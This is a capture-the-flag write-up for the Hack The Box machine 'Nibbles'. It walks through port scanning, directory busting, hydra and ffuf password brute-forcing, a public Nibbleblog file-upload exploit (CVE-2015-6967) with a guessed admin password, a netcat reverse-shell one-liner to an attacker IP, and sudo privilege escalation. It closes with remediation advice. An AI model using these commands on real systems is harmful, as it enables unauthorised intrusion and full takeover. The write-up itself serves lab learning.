Enumeration
nmap and rustscan at first.
Nmap
Command: nmap -A -p- -T4 -Pn -vv -oN nmap-report-tcp.txt 10.10.10.75
Result:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Rustscan
Command: rustscan -a 10.10.10.75 -r 1-65535 --ulimit 5000 -- -A
Result:
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.75:22
Open 10.10.10.75:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A" on ip 10.10.10.75
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94 ( https://nmap.org )
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelnmap and rustscan find an open port which is port 80. Here is the content of 10.10.10.75 on port 80.
Wappalyzer detects the use of PHP languages, Apache HTTP Server, Ubuntu as an OS, RSS, and jQuery 2.1.0 as JS library.
Viewing page source, I find /nibbleblog/ directory.
Here is the content of /nibbleblog/ directory.
While enumerating the site, I did set two dirbusters to do directory busting.
Command: dirbuster
Target: http://10.10.10.75:80
Threads: 100 each
Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Dir to start with: / and /nibbleblog
File extension: php,txt,sql,sh
Use blank extension: trueI set the extensions to php,txt,sql,sh because this web is supported by PHP programming language and is on ubuntu OS. txt and sql extension is just for prevention.
I leave it that way for a while and proceed to enumerating the site. It is stated in the website that it used Nibbleblog as Content Management System (CMS).
I found nothing inside the website. All of the clickable links are filled with “There are no posts” with more or less similar link structure url/nibbleblog/index.php?controller=blog&action=view&category={category}.
I run nikto to see if it found something while moving to dirbuster.
Command: nikto -url http://10.10.10.75/nibbleblog
Result:
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.75
+ Target Hostname: 10.10.10.75
+ Target Port: 80
+ Start Time: 2023-09-21
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /nibbleblog/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /nibbleblog/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /nibbleblog/: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /nibbleblog/admin.php?en_log_id=0&action=config: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5412
+ /nibbleblog/admin.php?en_log_id=0&action=users: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5412
+ /nibbleblog/admin/: Directory indexing found.
+ /nibbleblog/admin.php: This might be interesting.
+ /nibbleblog/admin/: This might be interesting.
+ /nibbleblog/README: README file found.
+ /nibbleblog/install.php: install.php file found.
+ /nibbleblog/LICENSE.txt: License file found may identify site software.
+ 8049 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2023-09-21 (2517 seconds)
---------------------------------------------------------------------------
+ 1 host(s) testedLooking back to dirbuster, a directory with path /nibbleblog/admin was found. So, I try to access it to see what it’s about.
After crawling around, I found that there are source codes lying around and dirbuster found a lot of interesting subdirectory. I decided to go to dirbuster first.
First one to catch my eyes is /nibbleblog/admin.php.
Here is what I try in admin.php:
- Trying some default credentials such as admin:admin, admin:123456, admin:Admin1234, etc. Didn’t work.
- There’s a forgot password functionality but it has issues with sending mail based on the error message.
- Using SQL injection payload such as ‘ “ ; -- # got blacklist protection.
- Nikto found CVE-2006-5412 which leads to this exploit-db article. It is said on the article that this exploit works with 4.4.0, 4.4.1, and previous version might affected too. So, I give it a try, to change the “en_log_id” parameter’s value from 0 to true. It doesn’t work.
I think there are several things that I have to try, but I decided to move forward first.
Dirbuster found install.php. There is only a sentence that said “Blog already installed… May be you want to update?” with the “update” <a> tagged to update.php.
After clicking the “update”, I got redirected to update.php with information that config DB, comments DB, and categories updated with nibleblog version 4.0.3 “Coffee” being used.
I find /content/private/config.xml and comments.xml and opened it. There is an email.
Gaining Foothold
The username of administrator might be “admin”, guessing from the email above. So, I do bruteforce credentials with hydra. Here is a website that explains hydra parameter. I’ll run it and set it aside.
Command: sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 80 -f 10.10.10.75 http-post-form "/admin.php?controller=user&action=login:username=admin&password=^PASS^:Incorrect username or password"There are multiple ways to bruteforce password, from ffuf, burpsuite (might crash if using rockyou.txt), or make my own script.
Might use ffuf for prevention. This link might be a good source to see how it works. Don’t forget to use quote unquote to prevent the ffuf from being daemon (running in background) if there is ampersand symbol being used in url.
Command: ffuf -request request.txt -request-proto http -mode pitchfork -w /usr/share/wordlists/rockyou.txt:PASSFUZZ -fs 48,1541Use filter response length so the shell wouldn’t flood with all the 200 success responses. It seems that there is a blacklist protection which means I can’t bruteforce, should have use rate limit.
Heads to internet to search for nibbleblog 4.0.3 vulnerability and I find the arbitrary file upload vulnerability. Here is some of the source where I read: github, exploit-db, and rapid7.
Username and password is needed based on github, meanwhile I don’t have the username or password. Giving it a try doesn’t hurt. So, I download the git and run it as instructed.
Command:
git clone https://github.com/dix0nym/CVE-2015-6967.git
cd CVE-2015-6967
python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload shell.phpUnless, I don’t have the shell.php. So, I download p0wny-shell and use the shell as payload.
I don’t expect it to work, with admin:nibbles credential I try to login. And it works.
Now that’s left to do is to search where the shell is uploaded. Based on the exploit code, it was uploaded to my_image plugin and can be accessed from /nibbleblog/content/private/plugins/my_image/image.php.
And with that, I get the user.txt.
Privilege Escalation
I use netcat to get reverse shell because more responsive.
Command: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1337 >/tmp/fThere is personal.zip at /home/nibbler which might be interesting. But, first thing that I usually do when got into user is checking the privilege on what can I do or run.
Command: sudo -l
Result:
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.shIt seems that I can run monitor.sh inside personal.zip, that is why the file is there. I try to unzip it first using “unzip personal.zip” command.
Nibbler have a write access, which means I can use it to sudo.
This is the the command that I use to add “sudo su” to monitor.sh.
Command: echo 'sudo su' >> monitor.shThen I run “sudo ./monitor.sh”.
Summary
There are several vulnerability here such as:
- Outdated version of nibbleblog.
- Source code disclosure and sensitive data exposure on directory listing (/nibbleblog/admin).
- Weak password policy (admin:nibbles).
- Arbitrary file upload (CVE-2015–6967).
- No access/permission control to protect file (/personal/stuff/monitor.sh).
Remediation that I might suggest is:
- Update nibbleblog or change it to newer CMS.
- Hide or move /nibbleblog/admin directory.
- Use stronger password.
- Don’t use outdated plugin.
- Fix the permission of file.
What didn’t work for me is:
- SQLi at admin login page
- Bruteforcing creds at admin login page using hydra (error) and ffuf(got blocked by nibbleblog)
There are possibilities that this machine have several vulnerability such as SQLi, XSS, etc. Please let me know if there are any recommendation, critics, or something that I might miss in this box. That’s all folks. Thanks for reading.
